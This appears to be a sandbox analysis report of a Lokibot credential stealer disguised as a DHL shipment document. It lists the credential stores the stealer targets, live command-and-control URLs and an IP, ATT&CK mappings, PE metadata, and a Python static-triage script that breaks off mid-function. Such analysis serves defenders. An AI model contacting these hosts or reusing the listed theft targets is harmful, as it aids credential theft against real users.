                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00406069 GetUserNameW, 3_2_00406069

                Stealing of Sensitive Information

Source: Yara match | File source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: PopPassword 3_2_0040D069
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: SmtpPassword 3_2_0040D069
Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic; the count the report attaches to a matched technique is given in parentheses)

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1), Process Injection (11), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Access Token Manipulation (1), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (2)
Credential Access: OS Credential Dumping (2), Credentials in Registry (2), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (21), Virtualization/Sandbox Evasion (31), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (13), Network Sniffing, Network Service Scanning
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Email Collection (1), Archive Collected Data (1), Data from Local System (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (1), Application Layer Protocol (111), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud
Impact: Modify System Partition, Device Lockout, Delete Device Data, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Source | Detection | Scanner | Label
DHL_Express_Shipment_DOC.exe | 19% | ReversingLabs |
DHL_Express_Shipment_DOC.exe | 30% | Virustotal |
DHL_Express_Shipment_DOC.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
No Antivirus matches
Source | Detection | Scanner | Label
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://robertmario.is/?feed=rss2 | 0% | Avira URL Cloud | safe
http://robertmario.is/index.php?rest_route=/ | 0% | Avira URL Cloud | safe
http://64.227.48.212/?page_id=215360 | 0% | Avira URL Cloud | safe
http://robertmario.is/?feed=comments-rss2 | 0% | Avira URL Cloud | safe
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://64.227.48.212/?page_id=215360 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://robertmario.is/?feed=rss2 | DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp; DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://robertmario.is/?feed=comments-rss2 | DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp; DHL_Express_Shipment_DOC.exe, 00000003.00000002.487142894.0000000003519000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ibsensoftware.com/ | DHL_Express_Shipment_DOC.exe; DHL_Express_Shipment_DOC.exe, 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://robertmario.is/index.php?rest_route=/ | DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP  Domain  Country  ASN  ASN Name  Malicious
64.227.48.212  unknown  United States  14061  DIGITALOCEAN-ASNUS  true
                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:831160
                  Start date and time:2023-03-21 07:11:09 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:4
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:DHL_Express_Shipment_DOC.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 97.9% (good quality ratio 93.9%)
                  • Quality average: 77%
                  • Quality standard deviation: 28.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 35
                  • Number of non-executed functions: 5
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
Time  Type  Description
07:13:18  API Interceptor  4x Sleep call for process: DHL_Express_Shipment_DOC.exe modified
Match  Associated Sample Name / URL  Detection  Threat Name  Context
64.227.48.212  AWB#8457108962.exe  malicious  Lokibot  64.227.48.212/?page_id=6303
64.227.48.212  Corporation_Statement.exe  malicious  Lokibot  64.227.48.212/?page_id=6303
64.227.48.212  DHL_Shipment_Documents.exe  malicious  Lokibot  64.227.48.212/?page_id=215360
64.227.48.212  DETTAGLI_SPEDIZIONE_TNT.exe  malicious  Lokibot  64.227.48.212/?page_id=9693760
64.227.48.212  ylz7Y1lTksMhzko.exe  malicious  Lokibot  64.227.48.212/?page_id=938859541697
64.227.48.212  Purchase_Inquiry.exe  malicious  Lokibot  64.227.48.212/?page_id=14475287
64.227.48.212  RFQ6789034-INQUIRY.exe  malicious  Lokibot  64.227.48.212/?page_id=6303
The same host serves several Lokibot builds that differ only in the page_id value of the C2 path; DHL_Shipment_Documents.exe uses the identical path (/?page_id=215360) as this sample.
                  No context
Match  Associated Sample Name / URL  Detection  Threat Name  Context
DIGITALOCEAN-ASNUS  https://go.surfaccounts.com/view/Init.aspx?965970e3-51a6-4e38-b1dc-f14b6d840139:1  malicious  Unknown  46.101.13.61
DIGITALOCEAN-ASNUS  x86_64.elf  malicious  Mirai, Moobot  157.230.1.108
DIGITALOCEAN-ASNUS  6lqMB7o2Ts.elf  malicious  Mirai, Moobot  157.230.191.4
DIGITALOCEAN-ASNUS  8oxYPvmeaT.elf  malicious  Mirai, Moobot  157.245.170.67
DIGITALOCEAN-ASNUS  k8CCRUs7Yi.elf  malicious  Mirai, Moobot  157.245.182.53
DIGITALOCEAN-ASNUS  AWB#8457108962.exe  malicious  Lokibot  64.227.48.212
DIGITALOCEAN-ASNUS  VeTv7e9Dcz.elf  malicious  Mirai, Moobot  157.245.169.42
DIGITALOCEAN-ASNUS  XHZFo8hExw.elf  malicious  Mirai, Moobot  157.245.211.186
DIGITALOCEAN-ASNUS  99cb969e-5c61-4204-9902-f21da96b8e7a.exe  malicious  Amadey  178.62.77.44
DIGITALOCEAN-ASNUS  v8OWS3Ylfj.elf  malicious  Mirai, Moobot  159.65.206.40
DIGITALOCEAN-ASNUS  https://yu0rxkej.page.link/fMNh  malicious  GRQ Scam  198.211.98.91
DIGITALOCEAN-ASNUS  kXf5n24SG6.elf  malicious  Mirai, Moobot  157.245.182.64
DIGITALOCEAN-ASNUS  https://rebrand.ly/1c050f  malicious  GRQ Scam  198.211.98.91
DIGITALOCEAN-ASNUS  OeW6IrGTzH.elf  malicious  Mirai, Moobot  157.230.24.170
DIGITALOCEAN-ASNUS  malware.one  malicious  Emotet  64.227.55.231
DIGITALOCEAN-ASNUS  Office-AddInHelper.exe  malicious  Amadey  142.93.229.91
DIGITALOCEAN-ASNUS  Corporation_Statement.exe  malicious  Lokibot  64.227.48.212
DIGITALOCEAN-ASNUS  DHL_Shipment_Documents.exe  malicious  Lokibot  64.227.48.212
DIGITALOCEAN-ASNUS  8846_0.one  malicious  Emotet  159.89.202.34
DIGITALOCEAN-ASNUS  DETTAGLI_SPEDIZIONE_TNT.exe  malicious  Lokibot  64.227.48.212
                  No context
                  No context
                  Process:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.355304211458859
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                  Malicious:true
Reputation:high, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
The preview is the beginning of a CLR assembly usage log (the "fusion","GAC" line followed by native-image paths under NativeImages_v4.0.30319_32), which the .NET runtime writes while loading the sample; it records the assemblies the loader pulled in (System.Windows.Forms, System.Drawing, System.Xml and others) rather than being output of the malware itself. The dropped file's path is not preserved in this page.
                  Process:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbq:4
                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:........................................user.
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.414207480565285
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  File name:DHL_Express_Shipment_DOC.exe
                  File size:852480
                  MD5:370ebdf4ff5036c106793994cc851779
                  SHA1:cc04ea26c1364b9a058b55c8697a49e1c7e16970
                  SHA256:1ebedb652fa27423240c3efa860e7551958811120737ee5d3ea7badf671fbacf
                  SHA512:63c2c4208a7d9c3c1176167f2c015c1a0bcb8b90cbb55cbb879aa93d0d7e0e128c1662273dfb73776c29466cf87c83f84be3acd48f871a125bc2189efafd3803
                  SSDEEP:12288:0wRZRbIx8nvRW3NVuf7sBF84DpHCojUzQO7auRJ0CXfmv5gn:02+xuv89V4gc4DVhhuRax
                  TLSH:F00507435EBB5085E8B70F38547A76980B34E953BDD9903B3CC9B61A8FFA68360463D1
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..d..............0.................. ... ....@.. .......................`............@................................
                  Icon Hash:00828e8e8686b000
                  Entrypoint:0x4d16ae
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6419125B [Tue Mar 21 02:11:39 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (disassembly at the entry point 0x4d16ae)
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the last line is repeated 97 times in the original listing: it is the disassembly of the zero bytes that follow the stub)
With the image base at 0x400000, 0x402000 is the 8-byte IAT listed in the data directories below, whose only entry is mscoree.dll!_CorExeMain. A single indirect jmp into the CLR's entry routine is the standard native stub of a .NET executable; the program's real logic is managed code, so native disassembly at the entry point shows nothing further.
Name  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_IMPORT  0xd1660  0x4b  .text
IMAGE_DIRECTORY_ENTRY_RESOURCE  0xd2000  0x5d8  .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION  0x0  0x0
IMAGE_DIRECTORY_ENTRY_SECURITY  0x0  0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC  0xd4000  0xc  .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG  0xd161d  0x1c  .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR  0x0  0x0
IMAGE_DIRECTORY_ENTRY_TLS  0x0  0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG  0x0  0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_IAT  0x2000  0x8  .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008  0x48  .text
A populated COM_DESCRIPTOR directory (the CLR header, 0x48 bytes at 0x2008) is what identifies the file as a .NET image; an empty SECURITY directory matches the "Digitally signed: false" entry above.
Name  Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy  Characteristics
.text  0x2000  0xcf6b4  0xcf800  False  0.7503800357680723  data  7.418461164070656  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  0xd2000  0x5d8  0x600  False  0.4309895833333333  data  4.156248863214128  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xd4000  0xc  0x200  False  0.044921875  data  0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.text accounts for almost the whole file (0xcf800 of 852480 bytes) at 7.42 bits per byte, which is why the file-level entropy above is 7.41; an executable section that close to 8 bits per byte is compressed or encrypted data rather than plain CIL, consistent with the Avira hit being on the unpacked memory image rather than on the file as stored.
Name  RVA  Size  Type  Language  Country
RT_VERSION  0xd20a0  0x34c  data
RT_MANIFEST  0xd23ec  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL  Import
mscoree.dll  _CorExeMain
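The static fields above (entry point inside .text, the DLL characteristics, the COM descriptor directory behind the single mscoree!_CorExeMain import, and per-section entropy) can be reproduced with nothing but the Python standard library. The script below is an added example, not Joe Sandbox's code: build_sample_pe() constructs a small synthetic PE32 in memory whose layout imitates the one reported above (entry point in a high-entropy executable .text, IAT and COM descriptor directories populated, the same timestamp and DLL characteristics), so that the script runs offline; the function names triage, entropy8 and build_sample_pe are the example's own.

```python
"""Static triage of a PE32 with the standard library only: entry-point
section, DLL characteristics, .NET (COM descriptor) check and per-section
entropy.  Added example; build_sample_pe() constructs a synthetic image."""
import math
import random
import struct
from datetime import datetime, timezone

DLL_FLAGS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14            # data directory indices


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for an empty or constant buffer, 8.0 at most."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(pe: bytes) -> dict:
    """Parse the headers of a PE32 image and return the first-pass static review fields."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
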